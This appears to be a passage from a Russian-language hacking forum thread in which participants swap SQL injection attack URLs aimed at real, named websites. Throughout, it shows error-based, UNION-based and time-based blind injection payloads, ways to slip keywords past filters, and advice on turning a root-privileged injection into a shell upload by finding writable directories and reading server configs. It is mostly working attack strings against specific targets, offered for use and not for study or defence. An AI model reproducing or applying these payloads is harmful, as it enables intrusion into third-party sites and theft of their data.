Вы уверены, что вам надо перебирать именно так, если возможно решить задачу более-результативным путем? К примеру получаем вывод имени базы данных через error-based, но немного другого типа: PHP: http://ukrcrewing.com.ua/agency%27or%201%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20--%20
Интересная SQL Code: seafarer.od.ua/?page=study&course=[COLOR=Red]2+order+by+7+--+[/COLOR] Но при операторах UNION+SELECT выдаёт ошибку будто кол-во столбцов неверно.
Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 103 group in /var/www/lesozavodsk/study.inc on line 11 PHP: http://seafarer.od.ua/?page=study&course=2+union+select+1,2,3,4,5,6,7+from+rdb$relations+--+
нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA Code: http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+ на select вроде обошёл
Точно, мне показалось, что дальше не прокатит .. Я вот ещё нашёл Code: http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+ http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+ но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.
Здесь time based http://www.autoonline.com.ua/news/index.php?id=4736+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+
HATA4OK, спасибо, но я уже сделал по другому. Code: http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+ Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(
И не выведешь. Тут слепая скуля. Кстати тут удобно использовать метод more1row Смотри сам: Code: http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=[COLOR=Yellow]4[/COLOR],1,(select+1+union+select+2)) [COLOR=Yellow]No error[/COLOR] http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=[COLOR=Yellow]5[/COLOR],1,(select+1+union+select+2)) [COLOR=Yellow]Error[/COLOR]
А тем более с четвёрки не вытащишь -( Кто может сказать, что за реагирование на *1 Code: http://pereprava.com.ua/index.php?id=1*1
http://pereprava.com.ua/index.php?id=1*1 (Вывод страницы 1) http://pereprava.com.ua/index.php?id=1*3 (Вывод страницы 3) Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция
Очередной фильтр SELECT Code: http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+ но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.
Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения... Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют... Возможно такой синтаксис: PHP: 130++div+++((5)+&255)+ Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?) зы /administrator/ 403, не залиться
Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc... Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...
Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
